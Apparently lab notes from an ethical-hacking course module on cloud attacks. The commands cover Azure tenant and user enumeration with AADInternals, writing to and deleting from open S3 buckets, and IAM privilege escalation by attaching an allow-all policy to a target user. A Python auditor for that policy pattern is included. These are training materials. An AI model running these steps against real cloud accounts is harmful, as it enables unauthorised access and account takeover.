Module 19 : Cloud Computing

Ethical hackers or pen testers use numerous tools and techniques to hack the target cloud platform. Recommended labs that will assist you in learning various cloud platform hacking techniques include:

  1. Perform Reconnaissance on Azure

    • Azure reconnaissance with AADInternals

  2. Exploit S3 buckets

    • Exploit open S3 buckets using AWS CLI

  3. Perform privilege escalation to gain higher privileges

    • Escalate IAM user privileges by exploiting misconfigured user policy

  4. Perform vulnerability assessment on Docker images

    • Vulnerability assessment on Docker images using Trivy

Lab 1: Perform Reconnaissance on Azure

Task 1: Azure Reconnaissance with AADInternals

## Installing AADInternals
    Install-Module AADInternals
    Import-Module AADInternals
## Available Commands:
1. Outsider reconnaissance of a domain on Azure:
     Invoke-AADIntReconAsOutsider -DomainName company.com | Format-Table
2. Enumerating a username:
     Invoke-AADIntUserEnumerationAsOutsider -UserName user@company.com
3. Enumerating usernames from a file:
     Get-Content .\users.txt | Invoke-AADIntUserEnumerationAsOutsider -Method Normal
4. Login information about the domain:
     Get-AADIntLoginInformation -Domain company.com
5. Login information of the user on Azure:
     Get-AADIntLoginInformation -UserName user@company.com
6. Retrieve the tenant ID:
     Get-AADIntTenantID -Domain company.com
7. Get registered domains on the tenant:
     Get-AADIntTenantDomains -Domain company.com

Or visit the following website:
https://aadinternals.com/osint/

Lab 2: Exploit S3 Buckets

Task 1: Exploit Open S3 Buckets using AWS CLI

## Installing AWS CLI
    pip2 install awscli
    aws configure
        1. AWS Access Key ID
        2. AWS Secret Access Key
        3. Default region name
        4. Default output format
    The access key values are generated from the AWS Console.
## CLI Commands:
1. Listing bucket contents:
    aws s3 ls s3://[Bucket Name]
2. Moving data into the S3 bucket:
    aws s3 mv Hack.txt s3://[Bucket Name]
3. Removing data from the bucket:
    aws s3 rm s3://[Bucket Name]/Hack.txt

Lab 3: Perform Privilege Escalation to Gain Higher Privileges

Task 1: Escalate IAM User Privileges by Exploiting Misconfigured User Policy

  1. Creating the user policy:

    vim user-policy.json

    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Action": "*",
                "Resource": "*"
            }
        ]
    }

  2. Creating the policy on AWS:

    aws iam create-policy --policy-name user-policy --policy-document file://user-policy.json

  3. Attaching the policy to the user:

    aws iam attach-user-policy --user-name [Target Username] --policy-arn arn:aws:iam::[Account ID]:policy/user-policy

  4. Listing the policies attached to the user:

    aws iam list-attached-user-policies --user-name [Target Username]

  5. Other available commands:

    List of S3 buckets: aws s3api list-buckets --query "Buckets[].Name"

    User policies: aws iam list-user-policies --user-name [Target Username]

    Role policies: aws iam list-role-policies --role-name [Role Name]

    Group policies: aws iam list-group-policies --group-name [Group Name]

    Create user: aws iam create-user --user-name [New Username]
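
A defender-side check for the kind of policy this lab creates and attaches, added here as an example and not part of the original lab notes. The function name `audit_policy`, the sample documents and the example bucket ARN are assumptions made for illustration; the check only inspects Allow statements on Resource "*" and ignores Condition blocks.

```python
from fnmatch import fnmatchcase

# IAM actions behind the lab's create-policy and attach-user-policy steps.
ESCALATION_ACTIONS = ("iam:createpolicy", "iam:attachuserpolicy")


def _as_list(value):
    """IAM accepts a single string or object wherever a list is allowed."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def audit_policy(document):
    """Return (statement_index, finding) tuples for risky Allow statements."""
    findings = []
    for index, stmt in enumerate(_as_list(document.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        if "*" not in _as_list(stmt.get("Resource")):
            continue  # this check only covers statements on Resource "*"
        if "NotAction" in stmt:
            findings.append((index, "NotAction on Resource * allows every unlisted action"))
            continue
        patterns = [a.lower() for a in _as_list(stmt.get("Action"))]
        if "*" in patterns:
            findings.append((index, "full administrator access (Action * on Resource *)"))
            continue
        for action in ESCALATION_ACTIONS:
            # Action names are case-insensitive and may use * and ? wildcards.
            if any(fnmatchcase(action, p) for p in patterns):
                findings.append((index, f"allows {action} on Resource *"))
    return findings


# Constructed samples: the lab's user-policy.json and a narrower misconfiguration.
LAB_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": "*", "Resource": "*"}]}
SCOPED_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": "s3:GetObject",
     "Resource": "arn:aws:s3:::example-bucket/*"},
    {"Effect": "Allow", "Action": ["iam:Create*", "iam:AttachUserPolicy"],
     "Resource": "*"}]}

if __name__ == "__main__":
    for name, doc in (("lab", LAB_POLICY), ("scoped", SCOPED_POLICY)):
        for index, finding in audit_policy(doc):
            print(f"{name} policy, statement {index}: {finding}")
```
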

Lab 4: Perform Vulnerability Assessment on Docker Images

Task 1: Vulnerability Assessment on Docker Images using Trivy

## Scanning Secure image "ubuntu"
    docker pull ubuntu
    trivy image ubuntu
## Scanning Vulnerable image "nginx:1.19.6"
    docker pull nginx:1.19.6
    trivy image nginx:1.19.6
